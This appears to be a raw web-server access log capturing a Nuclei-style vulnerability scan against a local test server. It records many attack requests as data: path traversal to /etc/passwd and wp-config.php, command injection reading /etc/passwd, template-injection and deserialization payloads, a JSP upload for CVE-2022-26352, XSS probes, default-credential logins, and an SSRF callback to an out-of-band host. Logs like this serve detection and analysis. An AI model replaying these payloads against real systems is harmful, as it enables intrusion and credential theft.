Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/apidocs/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"searchtype=5&order=}{end if} {if:1)phpinfo();if(1}{end if}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /search.php?searchtype=5 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /password.jsn HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-includes/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/nuclei.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /assets/_core/php/profile.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/release.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/printenv.pl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"action=tie_ajax_search&query[]=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /overview.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /users/sign_in HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /anything_here HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"{'jql':'project in projectsLeadByUser(\x2229KD1t21A0RKBIyIo2Jr1YtKxQN\x22)'}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /rest/issueNav/1/issueTable HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/file:%2f%2f/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"{\x22user\x22:\x22access-admin\x22,\x22password\x22:\x22password\x22,\x22type\x22:\x22login\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1/artifactory/webapp/", "request_method":"POST", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"--------------------------aadc326f7ae3eac3\x0D\x0AContent-Disposition: form-data; name=\x22name\x22; filename=\x22../../../../../../../../../srv/dotserver/tomcat-9.0.41/webapps/ROOT/29KD1tQnyWpmZ5nTHu6JayGoh7u.jsp\x22\x0D\x0AContent-Type: text/plain\x0D\x0A\x0D\x0A<%\x0D\x0Aout.println(\x22CVE-2022-26352\x22);\x0D\x0A%>\x0D\x0A--------------------------aadc326f7ae3eac3--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/content/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-ui/api-docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /owa/auth/logon.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /assets/php/profile.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /getFavicon?host=http://ca28fg0smpvbd3qg07h0jf9n734qhobuj.oast.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/publish.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=Admin-Data-down&id=../../Conf/config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appliance/login.ns HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fmlurlsvc/?=&url=https%3A%2F%2Fgoogle.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Default.aspx?pid=Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Dockerrun.aws.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/maint/repair.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29KD1tQnyWpmZ5nTHu6JayGoh7u.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/api-docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"Language_S=../../Data/CONFIG/CasDbCnn.dat","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /casmain.xgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /vendor/qcubed/qcubed/assets/php/profile.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sidekiq/queues/%22onmouseover=%22alert%28nuclei%29%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/deploy.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /default.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%61%27%22%3e%3c%69%6e%6a%65%63%74%61%62%6c%65%3e 